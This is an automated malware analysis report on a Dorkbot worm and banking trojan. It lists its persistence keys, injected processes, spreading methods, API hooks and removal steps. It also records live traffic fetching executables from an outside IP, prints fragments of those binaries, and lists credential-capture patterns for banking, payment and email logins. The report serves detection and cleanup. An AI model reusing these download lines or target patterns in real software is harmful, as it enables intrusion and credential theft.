HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Heur.Zygug.5 (B) (Emsisoft), Gen:Heur.Zygug.5 (AdAware), Worm.Win32.Dorkbot.FD, mzpefinder_pcap_file.YR, WormDorkbot.YR, GenericUDPFlooder.YR, GenericIRCBot.YR, GenericMSNWorm.YR, GenericUSBInfector.YR, GenericDNSBlocker.YR, GenericAutorunWorm.YR, GenericSYNFlooder.YR, GenericInjector.YR, BankerGeneric.YR, GenericProxy.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)Behaviour: Banker, Trojan, Flooder, Worm, WormAutorun, IRCBot, MSNWorm, DNSBlocker, UDPFlooder, SYNFlooder, Trojan-Proxy, USBInfector
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: d8dd74e13d9d77a32b5ffcfcb8637c74
SHA1: 350d58f67a3015f3af5eb13223dc278748a86281
SHA256: e77dfe7b402e6d96a152a0c44f178166832b1497ebf7cd5edd3b12af4ffaffda
SSDeep: 3072:QIZWWxukZThtCdVBJvXIATEi S9ofjh4BwL1/BKbcltbAX2:QIIWxu hOVTXIAQDSifjh4Bwx/B9ltK
Size: 148992 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company:
Created at: 2011-04-26 19:59:02
Analyzed on: Windows7 SP1 32-bit
Summary: Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
IRCBot | A bot can communicate with command and control servers via IRC channel. |
MSNWorm | A worm can spread its copies through the MSN Messanger. |
DNSBlocker | A program can block designated DNS servers for making it difficult for users to locate specific domains or web sites on the Internet. |
UDPFlooder | This program can make a UDP flood. A UDP flood attack is a denial-of-service attack using the User Datagram Protocol (UDP). It can be initiated by sending a large number of UDP packets to random ports on a remote host. |
SYNFlooder | This program can make a SYN flood. It is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic. |
Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
USBInfector | A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer. |
Process activity
The Trojan creates the following process(es):
C487.exe:1468
%original file name%.exe:1904
The Trojan injects its code into the following process(es):
twunk_16.exe:3204
twunk_16.exe:3392
mspaint.exe:316
B5D6.exe:1928
svchost.exe:2060
csrss.exe:368
winlogon.exe:416
conhost.exe:1456
Dwm.exe:2008
taskhost.exe:1940
Explorer.EXE:2024
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process C487.exe:1468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe (2755 bytes)
The process twunk_16.exe:3204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Tasks\alFSVWJB.job (328 bytes)
The process mspaint.exe:316 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.exe (868 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe (441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe (673 bytes)
The Trojan deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.tmp (0 bytes)
C:\%original file name%.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.tmp (0 bytes)
The process %original file name%.exe:1904 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\ScreenSaverPro.scr (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\temp.bin (673 bytes)
Registry activity
The process C487.exe:1468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"twunk_16.exe" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe"
The process mspaint.exe:316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3D 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\mspaint_RASAPI32]
"EnableConsoleTracing" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Hplqlx" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process %original file name%.exe:1904 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\d8dd74e13d9d77a32b5ffcfcb8637c74_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\d8dd74e13d9d77a32b5ffcfcb8637c74_RASAPI32]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\d8dd74e13d9d77a32b5ffcfcb8637c74_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\d8dd74e13d9d77a32b5ffcfcb8637c74_RASAPI32]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\d8dd74e13d9d77a32b5ffcfcb8637c74_RASMANCS]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\d8dd74e13d9d77a32b5ffcfcb8637c74_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\d8dd74e13d9d77a32b5ffcfcb8637c74_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Screen Saver Pro 3.1" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\ScreenSaverPro.scr"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
4378a8da40338491ea9a278934ac7b17 | c:\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe |
880f6421b7d7d4e2e9f83a7e87c3ec3b | c:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in urlmon.dll:
URLDownloadToFileA
URLDownloadToFileW
The Trojan installs the following user-mode hooks in WININET.dll:
HttpSendRequestA
HttpSendRequestW
InternetWriteFile
The Trojan installs the following user-mode hooks in DNSAPI.dll:
DnsQuery_A
DnsQuery_W
The Trojan installs the following user-mode hooks in WS2_32.dll:
send
GetAddrInfoW
The Trojan installs the following user-mode hooks in kernel32.dll:
MoveFileA
MoveFileW
CopyFileA
CreateFileA
CreateFileW
CopyFileW
The Trojan installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
ZwResumeThread
NtQueryDirectoryFile
ZwEnumerateValueKey
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer.A worm can spread its copies through the MSN Messanger.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
C487.exe:1468
%original file name%.exe:1904 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe (2755 bytes)
C:\Windows\Tasks\alFSVWJB.job (328 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\C487.exe (868 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\B5D6.exe (441 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\ScreenSaverPro.scr (673 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\temp.bin (673 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"twunk_16.exe" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\alFSVWJB\twunk_16.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Hplqlx" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Screen Saver Pro 3.1" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\ScreenSaverPro.scr" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: UnH Solutions
Product Name: Kaf
Product Version:
Legal Copyright:
Legal Trademarks: Ewyg Tesikit Ebixiz Ecuwy Besif Ofyroho Eku
Original Filename: 15wjn3qq3doye4t.exe
Internal Name: Mifuz
File Version:
File Description: Oqaf Dab Ygij
Comments:
Language: Language Neutral
Company Name: UnH SolutionsProduct Name: KafProduct Version: Legal Copyright: Legal Trademarks: Ewyg Tesikit Ebixiz Ecuwy Besif Ofyroho EkuOriginal Filename: 15wjn3qq3doye4t.exeInternal Name: MifuzFile Version: File Description: Oqaf Dab YgijComments: Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 98633 | 98816 | 4.75561 | 1af5a88a2f631d5d298b1bef0459fc5f |
.data | 106496 | 45640 | 46080 | 4.81555 | 541038287c5b73bc2df444eb90f8935c |
.rdata | 155648 | 1247 | 1536 | 2.89672 | f7dd77086cf158a2130e33a06633db8e |
.rsrc | 159744 | 8188 | 1536 | 1.70366 | 7a30d51cb7179aad10250e7ce128affb |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 8
bfdf64c2aaf06fb340ae6684806d2816
04808c95e2884f12c111ac8cec1d97f0
616b08f9b33aa929893c9a1a0a41580f
d0197bdcf1751841ed813b866d1b5e48
5d2607e7d9f441ffad9c9b21c868f906
f3cb37bae86a3eae34add7693c62a153
f2d940ffdad415b8f0ade3291a1a4f0d
832bd4205e3b8f339833d7cb35f13378
Network Activity
URLs
URL | IP |
---|---|
hxxp://api.wipmania.com/ | 212.83.168.196 |
hxxp://177.54.153.4/and927218.exe | |
hxxp://177.54.153.4/nut927218.exe | |
api.wipmania.net | 136.243.118.242 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /and927218.exe HTTP/1.1
User-Agent: Mozilla/4.0
Host: 177.54.153.4
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 25 Nov 2016 20:28:21 GMT
Accept-Ranges: bytes
ETag: "eecec8765a47d21:0"
Server: Microsoft-IIS/7.5
Date: Sat, 26 Nov 2016 09:00:47 GMT
Content-Length: 220672
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h..............qh......q{......qk.f...............&...........................Rich....................PE..L.....8X.....................................0....@..........................................................................=......................................................................(8..@............0...............................text...K........................... ..`.rdata.."....0......."..............@..@.data........P.......@..............@....rsrc................V..............@..@................................................................................................................................................................................................................................................................................................................................................................................................U......E..E...].U..3.]..........U....$.E.U....E......E..E..E..E.h.E.8.C..w...f.M..E.D.C..E........ C..]..E........U.....U..}............E.P.M.Q.U.R.E.Ph..C..s.......M.Q.U.R.E.P.M.QhT.C..V......j.j.j.h..C..C........U.R..E.P..M.Q..U.Rh..C.."........E.P..M.Q..U.R..E.Ph0.C..R.......M.Qh..C..........E...3...]...............U..QSV.E..'...u.j@...0A.......o.......... .3..........eC.^[..]..U........VW..0A..........0A.........X.........p.........t.........X.....C...X...R..........p.....t.....t...P..p...Q..X...Rh..C..
<<< skipped >>>
GET /nut927218.exe HTTP/1.1
User-Agent: Mozilla/4.0
Host: 177.54.153.4
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 25 Nov 2016 20:28:17 GMT
Accept-Ranges: bytes
ETag: "c9805c745a47d21:0"
Server: Microsoft-IIS/7.5
Date: Sat, 26 Nov 2016 09:00:50 GMT
Content-Length: 434176
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h..............qh......q{......qk.f...............&...........................Rich....................PE..L.....8X.....................................0....@..........................0...............................................~....... ...............................................................z..@............0...............................text...K........................... ..`.rdata..._...0...`..."..............@..@.data...............................@....rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................U......E..E...].U..3.]..........U....$.E.U....E......E..E..E..E.h.E. ^F..w...f.M..E.,^F..E........bF..]..E........U.....U..}............E.P.M.Q.U.R.E.Php^F..s.......M.Q.U.R.E.P.M.Qh<^F..V......j.j.j.h.^F..C........U.R..E.P..M.Q..U.Rh.^F.."........E.P..M.Q..U.R..E.Ph._F..R.......M.Qhl_F..........E...3...]...............U..QSV.E..'...u.j@...0A.......o.......... .3...........F.^[..]..U........VW..0A..........0A.........X.........p.........t.........X...._F...X...R..........p.....t.....t...P..p...Q..X...Rh._
<<< skipped >>>
GET / HTTP/1.1
User-Agent: Mozilla/4.0
Host: api.wipmania.com
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 26 Nov 2016 05:32:18 GMT
Content-Type: text/html
Content-Length: 20
Connection: keep-alive
Keep-Alive: timeout=20
194.242.96.218<br>UAHTTP/1.1 200 OK..Server: nginx..Date: Sat, 26 Nov 2016 05:32:18 GMT..Content-Type: text/html..Content-Length: 20..Connection: keep-alive..Keep-Alive: timeout=20..194.242.96.218<br>UA..
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
svchost.exe_2060:
.text
.text
`.data
`.data
.rsrc
.rsrc
@.reloc
@.reloc
msvcrt.dll
msvcrt.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
API-MS-Win-Core-ProcessThreads-L1-1-0.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-Win-Security-Base-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-Core-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
API-MS-WIN-Service-winsvc-L1-1-0.dll
RPCRT4.dll
RPCRT4.dll
ole32.dll
ole32.dll
ntdll.dll
ntdll.dll
_amsg_exit
_amsg_exit
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
GetProcessHeap
GetProcessHeap
svchost.pdb
svchost.pdb
version="5.1.0.0"
version="5.1.0.0"
name="Microsoft.Windows.Services.SvcHost"
name="Microsoft.Windows.Services.SvcHost"
Host Process for Windows Services
Host Process for Windows Services
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
Software\Microsoft\Windows NT\CurrentVersion\MgdSvchost
\PIPE\
\PIPE\
Host Process for Windows Services
Host Process for Windows Services
6.1.7600.16385 (win7_rtm.090713-1255)
6.1.7600.16385 (win7_rtm.090713-1255)
svchost.exe
svchost.exe
Windows
Windows
Operating System
Operating System
6.1.7600.16385
6.1.7600.16385
svchost.exe_2060_rwx_00060000_00021000:
.text
.text
.data
.data
.rsrc
.rsrc
@.reloc
@.reloc
IEw.AEw
IEw.AEw
%systemroot%
%systemroot%
%programfiles%\Common Files\*\*.exe
%programfiles%\Common Files\*\*.exe
%appdata%\Microsoft\*.exe
%appdata%\Microsoft\*.exe
%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe
%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exe
ole32.dll
ole32.dll
/c "%%SystemRoot%%\explorer.exe %Ã%%%s & start %Ã%%%s & exit"
/c "%%SystemRoot%%\explorer.exe %Ã%%%s & start %Ã%%%s & exit"
/c "start %Ã%%%s & start %Ã%%%s & exit"
/c "start %Ã%%%s & start %Ã%%%s & exit"
%SystemRoot%\system32\cmd.exe
%SystemRoot%\system32\cmd.exe
%SystemRoot%\system32\SHELL32.dll
%SystemRoot%\system32\SHELL32.dll
%s\temp.bin
%s\temp.bin
%s\_[$]_TESTFILE_[$]_
%s\_[$]_TESTFILE_[$]_
%s\%s
%s\%s
%s\%s.lnk
%s\%s.lnk
Windows_Shared_Mutex_231_thisittotalyfuckingshit
Windows_Shared_Mutex_231_thisittotalyfuckingshit
\ScreenSaverPro.scr
\ScreenSaverPro.scr
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
kernel32.dll
kernel32.dll
ntdll.dll
ntdll.dll
user32.dll
user32.dll
advapi32.dll
advapi32.dll
shell32.dll
shell32.dll
urlmon.dll
urlmon.dll
wininet.dll
wininet.dll
gdi32.dll
gdi32.dll
rpcrt4.dll
rpcrt4.dll
netapi32.dll
netapi32.dll
*.exe
*.exe
.gonewiththewings
.gonewiththewings
*.gonewiththewings
*.gonewiththewings
wipmania.com
wipmania.com
hXXp://api.wipmania.net/icon/n.api
hXXp://api.wipmania.net/icon/n.api
WindowsId
WindowsId
Microsoft\%s
Microsoft\%s
%s\%s\%s.exe
%s\%s\%s.exe
:Zone.Identifier
:Zone.Identifier
.quarantined
.quarantined
"%s" -shell
"%s" -shell
"%s" -bind
"%s" -bind
userinit.exe
userinit.exe
explorer.exe
explorer.exe
Windows critical error, require reboot
Windows critical error, require reboot
Windows Update
Windows Update
GetProcessHeap
GetProcessHeap
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyA
RegOpenKeyA
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
RPCRT4.dll
RPCRT4.dll
URLDownloadToFileA
URLDownloadToFileA
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\WindowsId Manager Reader
Software\WindowsId Manager Reader
WindowsMark
WindowsMark
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0A
tlSSSSSSSSSShL0A
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
%s_%d
%s_%d
-%sMutex
-%sMutex
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
PTF://%s:%s@%s:%d
PTF://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
httpi
httpi
dnsapi.dll
dnsapi.dll
hXXp://%s/%s
hXXp://%s/%s
hXXp://%s/
hXXp://%s/
POST /23s
POST /23s
[%s{%s%s{%s
[%s{%s%s{%s
n%s[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
